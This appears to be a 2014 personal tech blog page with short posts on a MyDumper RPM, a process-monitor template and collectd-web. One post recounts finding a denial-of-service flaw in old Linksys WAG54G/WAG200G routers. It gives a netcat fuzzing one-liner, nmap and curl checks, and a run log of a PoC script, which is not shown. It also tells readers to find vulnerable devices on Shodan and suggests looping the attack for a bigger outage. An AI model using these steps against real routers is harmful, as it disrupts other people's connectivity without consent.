Monday, September 29, 2014

MyDumper 0.6.2 RPM for CentOS 6.5

Hello....my new mydumper RPM package for Centos 6.5 is here.

From the original Changelog:
Bugs Fixed:
  • 1347392 last row of table not dumped if it brings statement over statement_size
  • 1157113 Compilation of latest branch fails on CentOS 6.3 64bit 
  • 1326368 Can't make against Percona-Server-devel-55 headers 
  • 1282862 unknown type name 'HASH'#1336860 k is used twice 
  • 913307 Can't compile - missing libs crypto and ssl 
  • 1364393 rows chunks doesn't increase non innodb jobs- TokuDB support- Support to dump tables from different schemasNew Features:- --lock-all-tables (instead of FTWRL)
Available in our repo:
PS: Not tested yet. Sorry. Any issue in the comments please.
Update: new version of mydumper available.

Wednesday, September 24, 2014

Process monitor template with logger and email notifier (daemonized)

If you are looking for a template to write a fast copy-and-paste script (daemonized) for monitoring one process... you can get some ideas from this:



Saturday, September 6, 2014

Killing old Linksys WAG54* or WAG200* like "Rambo" (temporary)

Two days ago i visited a friend of me. I was showing him how to discover open ports in a network with nmap. As example I chose his home gateway. His gateway is/was a WAG54G from Linksys. Without firmware uptated.  Year 2009, more or less.

He was surprised when we discovered two weird ports in the gateway: 5190 and 5566 ports. He didn't have any port configured to be open but I ignored that because  I thought they were some private ports to configure the gateway from a GUI in Windows or something similar.

We were speaking and connecting to some ports for a while.... and I figured out the behavior of 5566 port was different after connecting to the 5190 port.  It was very odd.

If you connect to the 5566 port you will receive a fast disconnection but if you make a connection to the 5190 port before, the 5566 port is waiting data in a lot of cases. Bye bye to the fast disconnection.

So, for my curiosity i tried to fuzz the port with /dev/urandom.... something similar to:
cat /dev/urandom | nc -v 192.168.1.1 5566
Meanwhile...when I was explaining to my friend about how a protocol works, our internet connection was down.

BOOM!        o_O

I said:  - Ermmm... Let me try it again buddy!      ..and...

BOOM!       O_O

I had to come back to home. In the way, I was thinking about the port issue.

At home, my first step was to see if those ports were private or public.... and BOOM! Public!

But I didn't have any router Linksys at home to try it again... so my friend Shodan came to the rescue! ;)

The next steps are very bored but, more or less, it was a huge trial and error process and, more or less , this was the PoC conclusion:

Ingredients:
  • Very old linksys: Shodan have a lot of them.
  • Ports 5190 and 5566 open: Shodan  has few of them but it has them.
  • Nmap to confirm some data.
There we go:
$ nmap -sS -p 5190,5566 x.x.x.x

Starting Nmap 5.51 ( http://nmap.org ) at 2014-09-06 08:33 CEST
Nmap scan report for gateway (x.x.x.x)
Host is up (0.080s latency).
PORT     STATE SERVICE
5190/tcp open  aol
5566/tcp open  westec-connect

Curl check:
$ curl -I -q --max-time 5 x.x.x.x
HTTP/1.1 401 Unauthorized
Server:
Date: Sat, 06 Sep 2014 06:31:53 GMT
WWW-Authenticate: Basic realm="Linksys WAG200G "
Content-Type: text/html
Connection: close

Ok. Ingredients Ok. We can run the PoC. Sometimes you need to run it twice or more times. Honestly I don't know why.

$ python OldLinksysMustDie.py x.x.x.x
OldLinksysMustDie v0.001b PoC
 * Connecting to x.x.x.x...
 * Cooking... be patient....
 * On Fire!
><
><
><
[BYEBYE] Ooops! connection to the target lost. [BYEBYE]

Curl again:

curl -I -q --max-time 5 x.x.x.x
curl: (28) Operation timed out after 5001 milliseconds with 0 bytes received

And RAMBO was here! I tried others one and... all temporary dead!!

NOTE: The router is recovered 5-10 minutes after running the PoC, but, if you want a big DOS, a "loop" in the computers world is so easy..... ;)

Finally, my horrible PoC (horrible like my English) in python:

Are you ready John?

Firmware affected: 
  • 1.01.04


Thursday, September 4, 2014

collectd-web for CentOS 6.5

There are RPM packages for collectd in CentOS 6.x, you will need the EPEL repository.

If you want a easy web interface to the graphs there is a collectd-web package there but, that package, is actually the collection3 frontend. So, if you prefer the original collectd-web, then you will need to install it from its github site. The most important will be to create the /etc/collectd/collection.conf file. Be careful, if you want to change the path you will need to modify the sources.

The collection file content for CentOS is something like:
datadir: "/var/lib/collectd/"
And a minimal configuration for the Apache would be like: